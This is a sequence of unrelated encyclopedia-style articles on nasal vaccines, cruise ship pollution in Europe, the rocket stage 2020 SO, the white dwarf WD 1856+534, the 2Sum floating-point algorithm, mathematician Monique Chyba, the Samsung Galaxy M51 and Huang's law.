Nasal sprays are commonly used for delivering drugs in addition to vaccines. Decongestant drugs are often directly delivered to the nose through nasal sprays. Cold and allergy medication can be administered using nasal sprays for local delivery by bypassing nasal hairs and being introduced to the nasal cavity. Intranasal administration can have less drug degradation compared to oral administration because of direct particle delivery. Peptide drugs used for hormone treatments can be delivered nasally through nasal sprays instead of orally to retain particle integrity. Nasal sprays can also be used to deliver diabetes treatment, steroids, and intranasal oxytocin to induce labor. Nasal administration is also used to deliver anesthetics and sedatives due to direct access to the mucosal immune system and bloodstream.
The olfactory epithelium makes up approximately 7% of the surface area of the nasal cavity and is connected to the olfactory bulb in the brain. Drugs and vaccines can be delivered to the brain past the blood-brain barrier through olfactory nerve cells.
Compared to injectable vaccines, nasal vaccines can be advantageous because they are safe, painless, and easy to use. Nasal vaccines do not require a needle, which eliminates pain from needlestick injuries and safety concerns due to cross-contamination and needle disposal. Some studies also show that intranasal vaccines can generate cross-reactive antibodies that could lead to cross-protection.
Live attenuated influenza vaccine
The live attenuated influenza vaccine (LAIV) in the form of a nasal spray was one of the first nasal vaccines released on the market. Nasal spray LAIVs have been used since the late 1980s as an alternative to the injectable influenza vaccine. Nasal influenza vaccines have become popular as they reduce the risk of intramuscular injuries from administration and are painless. They can also be given more easily to patients because they do not require a needle. The most prominent nasal LAIV is FluMist, which was released in 2003. FluMist, officially known as FluMist Quadrivalent in the United States and Fluenz in Europe, is known to be the only flu vaccine on the market that does not use a needle. All nasal LAIVs for recent flu seasons (2022-2023) are considered quadrivalent because “they are designed to protect against four types of flu viruses: an influenza A(H1N1) virus, an influenza A(H3N2) virus and two influenza B viruses.” Although injectable and nasal LAIVs are presented as options for yearly vaccination against influenza, FluMist was pulled from the United States market from 2016 to 2018 due to its ineffectiveness against a common influenza strain in children. Since then, FluMist has been reformulated and has re-entered the market. The active ingredients in nasal LAIVs are grown in fertilized chicken eggs. The practice of growing viruses in chicken eggs is common in vaccine production because these viruses need to be grown inside cells. Virus fluid from the incubated chicken eggs is extracted and killed for the viral antigen to be purified for LAIV production. Similar to other vaccines, nasal LAIVs contain ingredients in addition to the viral antigen. Stabilizers such as gelatine, arginine hydrochloride, monosodium glutamate, and sucrose are commonly used in vaccines to ensure the vaccines remain effective during and after production, transportation, storage, and delivery.
Stabilizers are especially important for nasal vaccines as proteases and amino-peptidase in the mucosal membrane can degrade proteins and peptides in vaccines. Research continues to improve nasal LAIVs as influenza affects nearly 9 million people. As influenza changes slightly each year, continuous research on new strains can improve vaccine efficiency. Research on nasal vaccine development for nontypeable Haemophilus influenzae shows that the vaccine binding to surface proteins prevented biofilm formation. As a result, this vaccine can have the potential to treat ear infections caused by biofilm from influenza infection. New components like α-galactosylceramide (α-GalCer) are also being researched to be used as nasal vaccines against influenza. Since α-GalCer induced immune responses when immunized with a replication-deficient live adenovirus, there is evidence that nasal LAIVs can be co-immunized with other treatments against influenza.
Intranasal COVID-19 vaccines
Prior to the 2020 global COVID-19 pandemic, animal studies in 2004 on African green monkeys tested a SARS-associated coronavirus (SARS-CoV) vaccine and showed that these monkeys did not shed the virus from their upper respiratory tract after being infected. Since then, several intranasal COVID-19 vaccines have been developed with the onset of the COVID-19 pandemic. inCOVACC, Razi Cov Pars, Sputnik, and Convidecia are nasal COVID-19 vaccines that were developed throughout the world to improve vaccine availability and reduce the spread of COVID-19.
In August 2020, during the COVID-19 pandemic, studies in mice and monkeys demonstrated that protection from the new coronavirus might be obtained through the nasal route. Another study postulated that if a COVID-19 vaccine could be given by a spray in the nose, people might be able to vaccinate themselves. Research about the main characteristics of nasal spray vaccines that can affect the efficiency of vaccine delivery for COVID-19 indicates that the spray cone angle can impact the delivery efficiency; droplet initial velocity and composition did not have as much of an impact on nasal vaccine efficiency as the spray cone angle.
India and China approved inCOVACC and Convidecia, respectively, to be used as boosters for those who have already received at least two COVID-19 vaccine doses. Although nasal COVID-19 vaccine research continues in the United States, lack of government funding could prevent this research from moving on to human trials to get approval for public administration. Privately funded research for nasal COVID-19 vaccines is starting to reach clinical trials; a nasal COVID-19 vaccine by Blue Lake Biotechnology has started its Phase 1 clinical trials as of late February 2023. Scientists speculate that nasal vaccines might have an advantage over other types of vaccines because they provide immune defense at the site of administration.
Applications to veterinary medicine
Species other than humans use nasal vaccines to prevent diseases. Intranasal vaccines are used on dogs against Bordetella bronchiseptica to prevent infectious tracheobronchitis (ITB). ITB, commonly known as kennel cough, typically spreads in highly populated environments such as kennels and dog shelters. Consistent vaccination against ITB using an intranasal vaccine can create an immune response that protects the vaccinated dog.
Cattle receive nasal vaccines against diseases such as bovine herpesvirus 1, parainfluenza type 3, and bovine rhinotracheitis virus. As all three of these viruses are related to respiratory infection, using an intranasal route can bring the vaccine directly to the respiratory system.
Recent discoveries indicate that rainbow trout have a previously unknown lymphoid structure in their nasal cavity. This structure allows them to have fast innate and adaptive responses to nasal vaccines.
Research
Current research is exploring new technologies and developments to improve nasal vaccine delivery methods. Particle size and characteristics have become a focus of research as smaller particles can travel more easily to reach the epithelial layer of the nasal cavity compared to larger particles. Nanoparticles and nanosystems are being researched to optimize nasal delivery. Coated nanoparticles are an area of focus due to their properties to induce immune effects. Glycol chitosan-coated nanoparticles induced more of an immune response compared to the other types of nanoparticles. Nanocarriers designed based on the characteristics of the nasal epithelium can be used to deliver nasal vaccines and can therefore make nasal vaccination more accessible. Polymeric nanosystems are also being developed to deliver vaccines to target sites while preventing them from degrading; current research is focused on understanding the material and physical properties of biodegradable materials to be used in nanosystems to improve vaccine efficacy. Research on the movement of nasal vaccine particles is focused on developing more effective ways for these vaccines to enter the body. An animal study on mice tested how a nasal vaccine can bypass issues with entry into the nasal epithelium by taking advantage of ciliary movement. The results indicated that tubulin tyrosine ligase-like family member 1 (Ttll1) knockout mice had higher levels of the vaccine antigen compared to the hetero mice.
See also
Nasal administration
Mucosal immunology
References
Vaccination
Drug delivery devices
Cruise ship pollution in Europe is a major part of the environmental impact of shipping. Most cruise ship companies operating in European exclusive economic zones (EEZs) are part of two mega corporations: Carnival Corporation & plc and the Royal Caribbean Group. In 2017, Carnival's cruise ships alone caused ten times more sulfur oxide (SOx) air pollution than all of Europe's cars (over 260 million) combined, as the ship fuel emits about 2,000 times more sulfur oxides than normal diesel fuel. All cruise ships together also accounted for 15% of the nitrogen oxide (NOx) particles emitted by all of Europe's passenger vehicles, and released large amounts of carbon dioxide (CO2), phosphorus (P4), soot, heavy metals, and other particulates into the atmosphere as well.
Background
Modern cruise ships evolved from ocean liners, which were the most common mode of transportation between Europe and the Americas until the rise of commercial aviation in the 1950s. Airliners drastically cut trans-Atlantic travel times and formed unbeatable competition for ocean liners in speed. To survive, the sector began to transform its ocean liners into cruise ships in the mid-1960s by attracting passengers by focusing the voyage on recreation and sightseeing, and less on getting travelers from A to B. Cruise lines such as Norwegian (1966), Royal Caribbean International (1968) and Carnival Cruise Line (1972) were founded in rapid succession, and over the course of years managed to expand by building ever larger cruise ships with more and more passengers (21 million globally in 2013), which increasingly negatively impacted the environment.
Most polluted port cities and countries
According to a 2019 study by Transport & Environment, the following European port cities were most polluted by cruise ships docking there (data from 2017):
Barcelona, Spain: 32.8 tonnes of SOx
Palma de Mallorca, Spain: 28 tonnes of SOx
Venice, Italy: 27.5 tonnes of SOx
Southampton (including Marchwood), United Kingdom: 27.1 tonnes of SOx
Civitavecchia (near Rome), Italy: 22.3 tonnes of SOx
Piraeus (near Athens), Greece: 21 tonnes of SOx
Funchal (on Madeira), Portugal: 18 tonnes of SOx
Livorno, Italy: 16.3 tonnes of SOx
Lisbon, Portugal: 16.1 tonnes of SOx
Santa Cruz de Tenerife, Spain: 15.6 tonnes of SOx
The following European countries have been most exposed to air pollution by cruise ships (data from 2017):
Spain: 14,496 tonnes of SOx
Italy: 13,895 tonnes of SOx
Greece: 7,674 tonnes of SOx
France: 5,950 tonnes of SOx
Norway: 5,261 tonnes of SOx
Fuel
The most commonly used fuel type for cruise ships is so-called heavy fuel oil (also called bunker oil or marine fuel), which is relatively cheap but highly pollutive. Although diesel fuel (also known as gas oil) can work as a low-sulfur alternative, this tends to be 33–35% more expensive on average. According to Deutsche Welle, 'an average-sized cruise ship carrying 2,000 passengers uses 150 tonnes a day when it's at sea; in port, it requires an average of 50 tonnes to meet the liner's electricity demands.' TRT World stated that ships like the Harmony of the Seas burn 'up to 4,900 litres of fuel per hour, 249,000 litres of fuel per day'. Clean Air Southampton claimed that giant vessels such as Navigator of the Seas require as much power as a town of 50,000 inhabitants when docked.
A 2018 study carried out by Naturschutzbund Deutschland (Nature Protection League Germany, NABU) reviewed the emissions of 77 cruise ships (almost the entire fleet in European waters), concluding that only one of them, AIDAnova, was not powered by highly polluting heavy fuel, but relatively 'clean' liquefied natural gas (LNG), which reduces NOx and particulate emissions by about 80%. However, even though shifting all cruise ships to LNG would be very beneficial to human health, LNG also contains methane, which is a very potent greenhouse gas and could increase global warming significantly through leaks and incomplete combustion.
Waste streams
Aside from air pollution, cruise ships produce various waste streams, namely wastewater from sinks, showers, and galleys (grey water), hazardous wastes, solid waste, oily bilge water, and ballast water.
Risks
Human health
Sulfur oxide (SOx) emissions form sulphate (SO4) aerosols that contribute to health risks in humans. SOx, fine particles (PM2.5) and nitrogen oxides (NOx) cause premature death by various means such as lung cancer, throat cancer, chronic obstructive pulmonary disease (COPD), cardiovascular diseases, and morbidity such as childhood asthma. Transport & Environment estimated that about 50,000 people a year in Europe die prematurely because of pollution from the shipping sector as a whole. This primarily affects people who live in harbour cities. In some cruise ports such as Southampton, children may be exposed to the polluted air when school playgrounds are near the docks. In Marseille, residents have been diagnosed with respiratory-related cancers at abnormally high rates after the cruise industry boomed.
Aside from the locals, measuring has shown that passengers are exposed to heightened concentrations of nitrogen oxides during their voyage. For example, Canadian environmental researchers, who had secretly conducted air quality tests at various times and places aboard four Carnival Corporation cruises, reported in 2019 that they 'found that levels of ultra-fine particulate matter at the back of the ship behind the smokestacks while the ship was moving that were comparable to some of the world's most polluted cities like Beijing and Santiago.' Carnival dismissed the claims as 'completely ridiculous', asserting its ships 'meet or exceed every requirement'. A University of British Columbia scientist also questioned some of the report's more drastic claims but agreed with the group's general conclusions about cruise shipping from an air pollution and climate change perspective.
Environment
The emissions contribute to ocean acidification and soil acidification. Nitrogen oxides also stimulate particle and ozone formation.
Damage to buildings
In addition to causing the third-worst air pollution in any port city in Europe, cruise ships passing through the Giudecca Canal damage building foundations of historical Venice, a World Heritage Site, as well as blocking the view of inhabitants and other tourists. A week after the 12 January 2012 Costa Concordia disaster, UNESCO urged Venetian authorities to restrict the future access of cruise ships to Venice and other Italian ports with vulnerable cultural historic architecture. That year, over 600 passenger ships docked in Venice, about 300 of which were categorised as mega-cruises (featuring thousands of passengers and ten decks), together carrying between 1.6 and 2 million passengers. In subsequent years, the city of Venice, for whom tourism is of critical importance, tried to reach a compromise with cruise lines, but in August 2014 the Italian government interfered by prohibiting ships surpassing the weight of 96,000 tonnes from getting near the historic centre in 2015. Plans to divert a third of the cruises were announced by Transport Minister Danilo Toninelli in August 2019, after MSC Opera crashed into a smaller river cruise ship and a quay in Venice on 2 June 2019, injuring five people; however, Toninelli's plans were criticised as unrealistic by activists and other politicians.
Regulations
International treaties
The International Maritime Organization (IMO) is the United Nations' agency for the regulation of international shipping, founded in 1948. The IMO's International Convention for the Prevention of Pollution from Ships, better known as MARPOL 73/78 (effective since 1983, and later expanded), set the most important international standard in containing the environmental pollution of shipping. Amongst other things, it prohibited any kind of dumping within three nautical miles of a coastline, and set limits on sulfur and nitrogen oxide emissions from ships.
In international law, the maximum sulfur oxide concentration in cruise ship emissions at full sea is 0.5% from 1 January 2020 onwards. This standard (sometimes called "IMO 2020") was recommended by a United Nations subcommittee in 2008, and adopted by the IMO in 2016. Previously, the maximum concentration at full sea was set at 3.5%. Since the most commonly used heavy fuel oil was still deemed to have an average sulfur content of around 2.7% as of July 2019, this was a major shift in oil market history, and ship companies found in violation of the new regulation could face huge penalties when caught by authorities.
The Ballast Water Management Convention, aimed at preventing problems such as the dispersal of invasive species, entered into force on 8 September 2017, and will fully apply on 8 September 2024.
However, shipping falls outside many international agreements such as the 1997 Kyoto Protocol and the 2015 Paris Agreement, and ships are also excluded from many national regulations because they move between countries, often through international waters. These aspects make it legally difficult to assign responsibility to a particular government authority, and practically difficult to check how much (cruise) ships emit and to enforce sanctions in case of violations.
Emission Control Areas
Sulfur Emission Control Areas (SECAs) mandate the most stringent marine sulfur fuel emission standard, but even in these areas cruise ship air pollution can remain a major issue. Moreover, as of 2017 there were only two SECAs in Europe, namely in the Baltic Sea and the North Sea, not in the rest of Europe's waters. The best marine sulfur standard (0.1% or 1000 parts per million) remains 100 times worse than Europe's sulfur standard for road diesel/petrol (0.001% or 10 parts per million) in place during 2004–2019. Protesters in the Port of Antwerp, whose 2019 anti-cruise petition was supported by 15,000 citizens, noted the paradox that the city of Antwerp has a low-emission zone for cars and other road vehicles, but highly pollutive cruise ships can just dock close to the city centre with only minor restrictions.
Docking restrictions
While docking, berthing or mooring in populated places for several hours, cruise ships such as the Harmony of the Seas are required to use auxiliary engines that burn low sulfur fuel, or use abatement technologies, in order to reduce the amount of air pollution they cause to the detriment of local inhabitants. However, critics say these measures are not enough to ensure their health.
Activists have pushed for cruise ships to use electricity from the shore (known as "shore power" or "cold ironing") during docking hours, but cruise lines have resisted this alternative. Shore power is already common in the United States, Canada and some European ports (however, as of April 2019, only two European ports are able to generate enough electricity to fully power cruise ships with their engines turned off), and Southampton planned to become the first port in Britain to introduce it in 2020 as well. Disadvantages of shore power include the drain on mains electricity and the required financial investment in installing the necessary infrastructure. According to CLIA, 28% of cruises used shore power in April 2019. The European Commission has ordered all ports in the European Union to make shore power available by 2025, unless there is no demand or the costs are higher than the environmental benefits.
Court cases
In 2016, Princess Cruises (a British-American subsidiary of Carnival Corporation that operates in Europe and North America) was ordered by a Miami court to pay 40 million U.S. dollars in damages for illegally dumping oil at sea in order to cut waste disposal costs. Initially, it was sued only for dumping 4,227 gallons (16,000 litres) of oil-contaminated waste off the coast of England on 26 August 2013 using a "magic pipe" from the Caribbean Princess. But later, authorities discovered that Princess Cruises had been committing this illegal pollution since 2005, that four other ships were guilty of the same practice, and that onboard sensors had been manipulated to avoid detecting seawater pollution. For violation of the probation terms of 2016, Carnival and Princess were ordered to pay an additional $20 million penalty in 2019. The new violations included discharging plastic into waters in the Bahamas, falsifying records, and interfering with court supervision.
In July 2018, for the first time in the French Mediterranean, the captain of a cruise ship, MS Azura, stood trial for breaking fuel emission limits in the port of Marseille.
Other solutions
Emissions and waste reduction
Catalytic converters could be installed to reduce the emissions of ships. In shipping, these are known as scrubbers. According to Cruise Lines International Association (CLIA), 60% of cruise ships already had a scrubber installed as of April 2019. This installation could be made mandatory by the EU. MSC Cruises claims that its MSC Grandiosa (built in 2016) has several filters which reduce its gas oil sulfur oxide emissions by 97%, and nitrogen oxide emissions by 80%. However, in October 2019 The Independent warned that most of the recently installed scrubbers (3,756 on ships, among them many cruise ships) were 'open-loop scrubbers', which enable sulfur extracted from the fumes to be transformed into a liquid that can be illegally discharged into the sea. These therefore constituted "cheat devices", intended to appear to comply with the IMO 2020 regulation while violating it in reality. Only 65 of the 3,756 scrubbers were closed-loop and could not be exploited for dumping sulfur extract at sea; they can only be opened on land for appropriately safe disposal there.
There are also oily water separators. According to CLIA, 62% of cruises filtered its wastewater (grey water) in April 2019.
Electric engines
It is possible to have ships run on electricity alone, especially for shorter distances such as between Sweden and Denmark. Electric engines do not emit any noxious gases (provided the electricity is clean), are silent and thus eliminate the noise pollution caused by internal combustion engines, and they require much less maintenance. On the other hand, electric batteries are relatively heavy, generate less power and speed overall, and need to be charged often, so they are less suitable over longer distances.
To reduce electricity consumption, some modern ships only use LED lamps.
Relocating terminals
The relocation of cruise ship passenger terminals away from densely populated areas to nearby towns or villages has been proposed in ports such as Venice, Antwerp and Amsterdam (Piet Heinkade), in order to reduce the number of local inhabitants exposed to air pollution (as well as spreading mass tourism more evenly). However, this has been met with protests from the surrounding towns and villages, which do not want the pollution and overtourism to spread to them instead, and the port cities themselves fear losing the economic benefits of tourism when the cruises dock too far away from where visitors will want to spend their money.
See also
Cruise ship pollution in the United States
Environmental impact of aviation
Phase-out of fossil fuel vehicles
Regulation of ship pollution in the United States
Short-haul flight ban
Notes
References
Climate change in Europe
Cruise lines
Environmental impact of shipping
Waste legislation in the European Union
Ocean pollution
Water pollution
2020 SO is a near-Earth object identified to be the Centaur upper stage used on 20 September 1966 to launch the Surveyor 2 spacecraft. The object was discovered by the Pan-STARRS 1 survey at the Haleakala Observatory on 17 September 2020. It was initially suspected to be an artificial object due to its low velocity relative to Earth and, later, the noticeable effects of solar radiation pressure on its orbit. Spectroscopic observations by NASA's Infrared Telescope Facility in December 2020 found that the object's spectrum is similar to that of stainless steel, confirming the object's artificial nature. Following the object's confirmation as space debris, the object was removed from the Minor Planet Center's database on 19 February 2021.
Overview
As it approached Earth, the trajectory indicated the geocentric orbital eccentricity was less than 1 by 15 October 2020, and the object became temporarily captured on 8 November when it entered Earth's Hill sphere. It entered via the outer Lagrange point and will exit via Lagrange point . During its geocentric orbit around Earth, 2020 SO made a close approach to Earth on 1 December 2020 at a perigee distance of approximately . It also made another close approach on 2 February 2021, at a perigee distance of approximately . Since discovery, the uncertainty in the time of the February 2021 closest approach to Earth was reduced from ±3 days to less than 1 minute. It left Earth's Hill sphere around 8 March 2021.
Paul Chodas of the Jet Propulsion Laboratory suspects 2020 SO of being the Surveyor 2 Centaur rocket booster, launched on 20 September 1966. The Earth-like orbit and low relative velocity suggest a possible artificial object. Spectroscopy may help determine if it is covered in white titanium dioxide paint. Goldstone radar will make bistatic observations transmitting from the 70-meter DSS-14 and receiving at the 34-meter DSS-13. As a result of the bistatic DSS-14/RT-32 radar observations, a rotation period of about 9.5 seconds was obtained, which corresponds to the photometric observations. Obtained range-Doppler radar images confirm that the object has an elongated shape with a length of about 10 meters and a width of about 3 meters.
Around the time of closest approach on 1 December 2020, the object brightened to only about apparent magnitude 14.1, and required a telescope with roughly a 150 mm (6") objective lens to be seen visually. It displays a large light curve amplitude of 2.5 magnitudes, signifying a highly elongated shape or albedo variations on its surface. It has a rotation period of approximately 9 seconds.
At the time of its discovery, 2020 SO had unremarkable motion typical of a main-belt asteroid. However, the four observations that Pan-STARRS obtained over the course of 1.4 hours showed non-linear motion due to the rotation of the observer around Earth's axis, which is a signature of a nearby object.
In January and February 2036, it will again approach Earth with a geocentric eccentricity less than 1 since the relative velocities will be small, but will not be within Earth's Hill sphere of .
See also
J002E3 – a near-Earth object discovered in 2002 that was identified as the S-IVB third stage of the Apollo 12 Saturn V rocket
WT1190F – temporarily orbiting space debris that entered Earth's atmosphere in 2015
– an artificial object discovered in a temporary orbit around Earth in 2018, now suspected to be the Snoopy module from Apollo 10
6Q0B44E – another artificial object discovered in orbit around Earth in 2018
Space debris
Temporary satellite
Notes
References
External links
"Pseudo-MPEC" for 2020 SO = Surveyor 2 Centaur, Bill Gray, Project Pluto, 31 January 2021
Earth May Have Recaptured a 1960s-Era Rocket Booster, Tony Greicius, NASA, 12 November 2020
Animation of the Line of Variation (via clone orbits) stretching out from December 2020 to May 2021
01 Dec 2020 image and rotation – Virtual Telescope Project / G. Masi
01 Dec 2020 time-lapse and photometry – Virtual Telescope Project / G. Masi
Minor planet object articles (unnumbered)
Claimed moons of Earth
Space debris
20200917
Rocket stages
Atlas (rocket family)
Surveyor program (NASA)
WD 1856+534 is a white dwarf located in the constellation of Draco. At a distance of about from Earth, it is the outer component of a visual triple star system consisting of an inner pair of red dwarf stars, named G229-20. The white dwarf displays a featureless absorption spectrum, lacking strong optical absorption or emission features in its atmosphere. It has an effective temperature of , corresponding to an age of approximately 5.8 billion years. WD 1856+534 is approximately half as massive as the Sun, while its radius is far smaller, only about 40% larger than Earth's.
Planetary system
The white dwarf is known to host one exoplanet, WD 1856+534 b, in orbit around it. The exoplanet was detected through the transit method by the Transiting Exoplanet Survey Satellite (TESS) between July and August 2019. An analysis of the transit data in 2020 revealed that it is a Jupiter-like giant planet with a radius over ten times that of Earth's, and orbits its host star closely at a distance of 0.02 astronomical units (AU), with an orbital period 60 times shorter than that of Mercury around the Sun.
The unexpectedly close distance of the exoplanet to the white dwarf implies that it must have migrated inward after its host star evolved from a red giant to a white dwarf, otherwise it would have been engulfed by its star. This migration may be related to the fact that WD 1856+534 belongs to a hierarchical triple-star system: the white dwarf and its planet are gravitationally bound to a distant companion, G 229–20, which itself is a binary system of two red dwarf stars. Gravitational interactions with the companion stars may have triggered the planet's migration through the Lidov–Kozai mechanism in a manner similar to some hot Jupiters. An alternative hypothesis is that the planet instead has survived a common envelope phase. In the latter scenario, other planets engulfed before may have contributed to the expulsion of the stellar envelope. JWST observations seem to disfavour the formation via common envelope and instead favour high eccentricity migration.
The planetary transmission spectrum obtained with GTC OSIRIS is gray and featureless, likely because of the high level of hazes. The transmission spectrum was also obtained with Gemini GMOS. It does not show any features besides a possible dip at 0.55 μm. This feature could be caused by auroral emission on the nightside of the planet. The researchers found a minimum mass of 0.84 by accounting for the transit geometry of a grazing transit. The researchers also revised the white dwarf parameters and found a total age of 8-10 billion years, in agreement with the system belonging to the thin disk.
A search with transit timing variations found no additional planets. The search excludes planets with a mass of more than 2 with orbital periods as long as 500 days, and planets with >10 with orbital periods as long as 1000 days.
See also
WD 1145+017, a white dwarf with a transiting disrupted planetary-mass object
WD J0914+1914, a white dwarf with a disk of debris originating from a possible giant planet
ZTF J0139+5245, another white dwarf with a disk of debris from a disrupted planetary-mass object
CWISEP J1935-1546 – a free-floating object with aurora emission in the infrared
List of exoplanets and planetary debris around white dwarfs
Notes
References
External links
NASA Missions Spy First Possible ‘Survivor’ Planet Hugging White Dwarf Star, Sean Potter, NASA, 16 September 2020
Planet discovered transiting a dead star, Steven Parsons, Nature News and Views, 16 September 2020
White dwarfs
Astronomical objects discovered in 2020
Draco (constellation)
Planetary systems with one confirmed planet
Gas giants
1690, TOI | WD 1856+534 | [
"Astronomy"
] | 775 | [
"Constellations",
"Draco (constellation)"
] |
65,373,517 | https://en.wikipedia.org/wiki/2Sum | 2Sum is a floating-point algorithm for computing the exact round-off error in a floating-point addition operation.
2Sum and its variant Fast2Sum were first published by Ole Møller in 1965.
Fast2Sum is often used implicitly in other algorithms such as compensated summation algorithms; Kahan's summation algorithm was published first in 1965, and Fast2Sum was later factored out of it by Dekker in 1971 for double-double arithmetic algorithms.
The names 2Sum and Fast2Sum appear to have been applied retroactively by Shewchuk in 1997.
Algorithm
Given two floating-point numbers a and b, 2Sum computes the floating-point sum s = a ⊕ b rounded to nearest and the floating-point error t so that a + b = s + t, where ⊕ and ⊖ respectively denote addition and subtraction rounded to nearest.
The error t is itself a floating-point number.
Inputs: floating-point numbers a, b
Outputs: rounded sum s = a ⊕ b and exact error t = (a + b) − s
  s ← a ⊕ b
  a′ ← s ⊖ b
  b′ ← s ⊖ a′
  δa ← a ⊖ a′
  δb ← b ⊖ b′
  t ← δa ⊕ δb
  return (s, t)
Provided the floating-point arithmetic is correctly rounded to nearest (with ties resolved any way), as is the default in IEEE 754, and provided the sum does not overflow and, if it underflows, underflows gradually, it can be proven that a + b = s + t.
A variant of 2Sum called Fast2Sum uses only three floating-point operations, for floating-point arithmetic in radix 2 or radix 3, under the assumption that the exponent of a is at least as large as the exponent of b, such as when |a| ≥ |b|:
Inputs: radix-2 or radix-3 floating-point numbers a and b, of which at least one is zero, or which respectively have normalized exponents e_a ≥ e_b
Outputs: rounded sum s = a ⊕ b and exact error t = (a + b) − s
  s ← a ⊕ b
  z ← s ⊖ a
  t ← b ⊖ z
  return (s, t)
Even if the conditions are not satisfied, 2Sum and Fast2Sum often provide reasonable approximations to the error, i.e. s + t ≈ a + b, which enables algorithms for compensated summation, dot-product, etc., to have low error even if the inputs are not sorted or the rounding mode is unusual.
More complicated variants of 2Sum and Fast2Sum also exist for rounding modes other than round-to-nearest.
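A direct Python transliteration of both algorithms (Python floats are IEEE 754 doubles with round-to-nearest, so ordinary + and - correspond to the rounded ⊕ and ⊖ operations; function and variable names are illustrative):

```python
def two_sum(a, b):
    """2Sum: return (s, t) with s the rounded sum of a and b
    and t the exact rounding error, so a + b == s + t exactly."""
    s = a + b
    a_virtual = s - b          # recover the part of s that came from a
    b_virtual = s - a_virtual  # recover the part of s that came from b
    delta_a = a - a_virtual    # rounding error attributable to a
    delta_b = b - b_virtual    # rounding error attributable to b
    return s, delta_a + delta_b

def fast_two_sum(a, b):
    """Fast2Sum: same result in three operations, valid when |a| >= |b|."""
    s = a + b
    z = s - a                  # the part of b that made it into s
    return s, b - z            # the part of b that was rounded away

s, t = two_sum(0.1, 0.2)       # s = 0.30000000000000004, t = -2**-55
```

The returned pair satisfies s + t == a + b exactly, even though s alone carries a rounding error; compensated-summation algorithms accumulate these t terms to correct the running sum.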
See also
Kahan summation algorithm
Round-off error
Double-double arithmetic
References
Computer arithmetic
Floating point
Numerical analysis | 2Sum | [
"Mathematics"
] | 446 | [
"Computational mathematics",
"Computer arithmetic",
"Arithmetic",
"Mathematical relations",
"Numerical analysis",
"Approximations"
] |
65,374,549 | https://en.wikipedia.org/wiki/Monique%20Chyba | Monique Chyba (born 1969) is a control theorist who works as a professor of mathematics at the University of Hawaiʻi at Mānoa. Her work on control theory has involved the theory of singular trajectories, and applications in the control of autonomous underwater vehicles. More recently, she has also applied control theory to the prediction and modeling of the spread of COVID-19 in Hawaii.
Education and career
Chyba's parents Mirek and Jana Chyba were Czech, but settled in Geneva, Switzerland. Chyba earned a Ph.D. through the University of Burgundy in Dijon, France, in 1997, while working as a teaching assistant at the University of Geneva. Her dissertation, Le Cas Martinet en Geometrie Sous-Riemannienne [the Martinet case in sub-Riemannian geometry], was supervised by Bernard Bonnard.
After postdoctoral research at Pierre and Marie Curie University, Harvard University, INRIA Sophia Antipolis, Princeton University, and the University of California, Santa Cruz, she joined the University of Hawaiʻi faculty in 2002, and was promoted to full professor in 2012.
Book
Chyba is an author of the book Singular Trajectories and their Role in Control Theory (with Bernard Bonnard, Springer, 2003).
Recognition
In 2014, Chiba University in Japan gave Chyba their Science and Lectureship Award.
References
External links
Home page
1969 births
Living people
Women mathematicians
University of Hawaiʻi at Mānoa faculty
Control theorists
University of Burgundy alumni | Monique Chyba | [
"Engineering"
] | 312 | [
"Control engineering",
"Control theorists"
] |
65,380,208 | https://en.wikipedia.org/wiki/Samsung%20Galaxy%20M51 | The Samsung Galaxy M51 is a mid-range Android smartphone manufactured by Samsung Electronics as part of their M series. It was announced in late August 2020 and released the following month. The phone has a 6.7 in sAMOLED Plus display, a 64 MP quad-camera setup, and a 7000 mAh battery. It is primarily derived from the Samsung Galaxy A71 in terms of design and specifications.
Specifications
Hardware
The Samsung Galaxy M51 has a Super AMOLED Plus Infinity-O Display with a 1080 × 2400 resolution, a 20:9 aspect ratio, and a pixel density of ~385 ppi. The phone comes with 128 GB of internal storage, as well as either 6 or 8 GB of RAM. The storage can be expanded via microSD. The phone is powered by the Qualcomm SDM730 Snapdragon 730G (8 nm) paired with the Adreno 618 GPU.
Battery
The Samsung Galaxy M51 has a non-removable lithium-ion battery with a 7000 mAh capacity. This is the highest battery capacity of any Samsung Galaxy phone as of September 2020, and significantly higher than most other widely available phones.
Cameras
The Samsung Galaxy M51 has a quad-camera setup arranged in an “L” shape in the top left corner of the plastic back. The camera setup consists of a 64 MP wide-angle camera capable of 4K video recording, a 12 MP ultrawide camera, a 5 MP macro camera for close-up shots, and a 5 MP depth sensor for Live Focus. A single 32 MP front-facing camera is tucked into the punch-hole in the top center of the display.
Software
The Samsung Galaxy M51 comes with Android 10 and Samsung's signature One UI 2.1. In late 2021, Samsung announced that the Galaxy M51 would receive an Android 12 update based on One UI 4.1.
History
The Samsung Galaxy M51 was announced on August 31, 2020. It was released the following month on September 11, 2020.
See also
Samsung Galaxy M series
Samsung Galaxy
References
M51
Mobile phones introduced in 2020
Android (operating system) devices
Galaxy M51
Phablets
Mobile phones with multiple rear cameras
Mobile phones with 4K video recording
M51 | Samsung Galaxy M51 | [
"Technology"
] | 457 | [
"Crossover devices",
"Phablets"
] |
65,380,994 | https://en.wikipedia.org/wiki/Huang%27s%20law | Huang's law is the observation in computer science and engineering that advancements in graphics processing units (GPUs) are growing at a rate much faster than with traditional central processing units (CPUs). The observation is in contrast to Moore's law that predicted the number of transistors in a dense integrated circuit (IC) doubles about every two years. Huang's law states that the performance of GPUs will more than double every two years. The hypothesis is subject to questions about its validity.
History
The observation was made by Jensen Huang, the chief executive officer of Nvidia, at its 2018 GPU Technology Conference (GTC) held in San Jose, California. He observed that Nvidia's GPUs were "25 times faster than five years ago" whereas Moore's law would have expected only a ten-fold increase. As microchip components became smaller, it became harder for chip advancement to keep pace with Moore's law.
In 2006, Nvidia's GPU had a 4x performance advantage over other CPUs. In 2018 the Nvidia GPU was 20 times faster than a comparable CPU node, with the GPUs becoming 1.7x faster each year. Moore's law would predict a doubling every two years; however, Nvidia's GPU performance more than tripled every two years, fulfilling Huang's law.
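The quoted figures imply compound growth rates that can be checked with a few lines of arithmetic (an illustrative sketch only; the 1.7x-per-year and "25 times in five years" figures are Nvidia's own claims, and Moore's law is here taken as a literal doubling every two years):

```python
# Rough comparison of the growth rates quoted above (illustrative arithmetic only).
moore_per_year = 2 ** (1 / 2)   # Moore's law: doubling every two years
huang_per_year = 1.7            # claimed annual GPU speedup

print(f"Moore's law over 5 years: {moore_per_year ** 5:.1f}x")      # 5.7x
print(f"1.7x/yr over 5 years: {huang_per_year ** 5:.1f}x")          # 14.2x
print(f"Implied by 25x in 5 years: {25 ** (1 / 5):.2f}x per year")  # 1.90x
```

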